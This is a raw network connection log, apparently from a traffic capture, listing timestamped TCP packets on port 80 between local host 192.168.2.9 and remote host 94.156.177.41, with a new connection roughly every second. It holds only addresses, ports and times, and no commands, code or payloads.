Jan 10, 2025 23:40:16.344711065 CET	50030	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:16.349411011 CET	80	50030	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:16.484033108 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:16.488867998 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:16.488954067 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:16.490894079 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:16.495659113 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:16.495719910 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:16.500526905 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.240819931 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.240994930 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.241025925 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.241084099 CET	50031	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.245800972 CET	80	50031	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.386208057 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.391069889 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.391177893 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.393306971 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.398065090 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:17.398130894 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:17.402878046 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.254407883 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.254523993 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.254568100 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.254610062 CET	50033	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.259362936 CET	80	50033	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.402481079 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.409385920 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.409482956 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.411567926 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.418235064 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:18.418308020 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:18.423126936 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.174654007 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.174717903 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.174820900 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.174879074 CET	50034	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.179728985 CET	80	50034	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.324080944 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.329083920 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.329183102 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.331310034 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.336179972 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:19.336241961 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:19.341041088 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.066636086 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.066690922 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.066731930 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.069909096 CET	50035	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.074783087 CET	80	50035	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.304104090 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.308974981 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.309062004 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.311211109 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.315985918 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:20.316028118 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:20.320785999 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.045209885 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.045310974 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.045495033 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.045543909 CET	50036	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.050112963 CET	80	50036	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.189260006 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.194154978 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.194267988 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.196549892 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.201422930 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.201504946 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.206341982 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.955156088 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.955229044 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:21.955338001 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.955388069 CET	50037	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:21.960179090 CET	80	50037	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.103339911 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.108263016 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.108491898 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.110436916 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.115197897 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.115263939 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.120085001 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.833010912 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.833070040 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.833111048 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.833142996 CET	50038	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.837897062 CET	80	50038	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.989837885 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.994807005 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:22.994874001 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:22.997394085 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.003001928 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.003055096 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.008182049 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.751576900 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.751684904 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.751820087 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.751869917 CET	50039	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.756670952 CET	80	50039	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.922851086 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.928030014 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.928746939 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.931641102 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.936969042 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:23.937030077 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:23.942181110 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.799241066 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.799261093 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.799360037 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.799408913 CET	50040	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.804205894 CET	80	50040	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.950524092 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.955324888 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.955415010 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.957561016 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.962327003 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:24.962376118 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:24.967195034 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.745421886 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.745523930 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.745558023 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.745605946 CET	50041	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.750405073 CET	80	50041	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.887903929 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.892677069 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.892771006 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.894891024 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.899683952 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:25.899745941 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:25.904634953 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.637778997 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.637887001 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.637939930 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.637988091 CET	50042	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.642699003 CET	80	50042	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.784219027 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.789036989 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.789163113 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.791374922 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.796446085 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:26.796508074 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:26.802927971 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:27.986593962 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:27.986604929 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:27.986613989 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:27.986716032 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:27.987335920 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:27.987397909 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:27.998538971 CET	50043	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:28.003295898 CET	80	50043	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:28.335796118 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:28.340727091 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:28.340795994 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:28.343265057 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:28.348069906 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:28.348115921 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:28.352947950 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.071083069 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.071348906 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.071408987 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.074222088 CET	50044	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.079000950 CET	80	50044	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.239293098 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.244090080 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.244204998 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.246335030 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.251127005 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.251179934 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.255912066 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.972733974 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.972876072 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.972908974 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:29.973337889 CET	50045	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:29.977689981 CET	80	50045	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.117765903 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.122647047 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.122726917 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.124803066 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.129570961 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.129740000 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.134607077 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.832135916 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.832259893 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.832317114 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.832344055 CET	50046	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.837132931 CET	80	50046	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.977459908 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.982429981 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.982517004 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.984646082 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.989501953 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:30.989628077 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:30.994415045 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.733160973 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.733181953 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.733241081 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.733297110 CET	50047	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.738959074 CET	80	50047	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.871176958 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.876101017 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.876235962 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.878393888 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.883235931 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:31.883333921 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:31.890124083 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.606173992 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.606276989 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.606353998 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.609250069 CET	50048	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.614077091 CET	80	50048	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.745989084 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.750790119 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.750886917 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.753004074 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.757772923 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:32.757846117 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:32.762624979 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.445697069 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.445790052 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.445835114 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.445869923 CET	50049	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.450634956 CET	80	50049	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.588807106 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.593650103 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.593779087 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.595974922 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.600718021 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:33.600821972 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:33.605505943 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.369199991 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.369216919 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.369359016 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.369389057 CET	50050	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.374172926 CET	80	50050	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.512722969 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.517621994 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.517699957 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.519795895 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.524568081 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:34.524652004 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:34.529514074 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.253545046 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.253695965 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.253709078 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.253735065 CET	50051	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.258507013 CET	80	50051	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.400022984 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.404820919 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.404926062 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.414771080 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.419533014 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:35.419612885 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:35.424386024 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.154293060 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.154360056 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.154474020 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.154509068 CET	50052	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.159353971 CET	80	50052	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.298413992 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.303782940 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.303970098 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.306629896 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.312232971 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:36.312372923 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:36.317451954 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.040738106 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.040805101 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.040945053 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.040945053 CET	50053	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.045743942 CET	80	50053	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.179651976 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.184509993 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.184587955 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.186683893 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.191515923 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.191586018 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.196361065 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.887149096 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.887233019 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:37.887351990 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.887510061 CET	50054	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:37.892347097 CET	80	50054	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.026783943 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.031708956 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.031830072 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.034048080 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.038856030 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.038960934 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.043755054 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.783715963 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.783862114 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.783875942 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.783924103 CET	50055	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.788691044 CET	80	50055	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.934365034 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.939289093 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.939502954 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.941714048 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.946470022 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:38.946532965 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:38.951330900 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.680305004 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.680454016 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.680469036 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.680502892 CET	50056	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.685422897 CET	80	50056	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.827400923 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.832254887 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.832351923 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.834460020 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.839200974 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:39.839304924 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:39.844109058 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.580161095 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.580293894 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.580301046 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.580353975 CET	50057	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.585072041 CET	80	50057	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.729520082 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.734329939 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.734412909 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.736473083 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.741307974 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:40.741383076 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:40.746128082 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.452430964 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.452588081 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.452593088 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.452632904 CET	50058	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.457425117 CET	80	50058	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.615529060 CET	50059	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.620569944 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.620815992 CET	50059	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.622955084 CET	50059	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.627861023 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:41.627955914 CET	50059	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:41.632833958 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.341339111 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.341411114 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.341480970 CET	50059	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:42.341526985 CET	50059	80	192.168.2.9	94.156.177.41
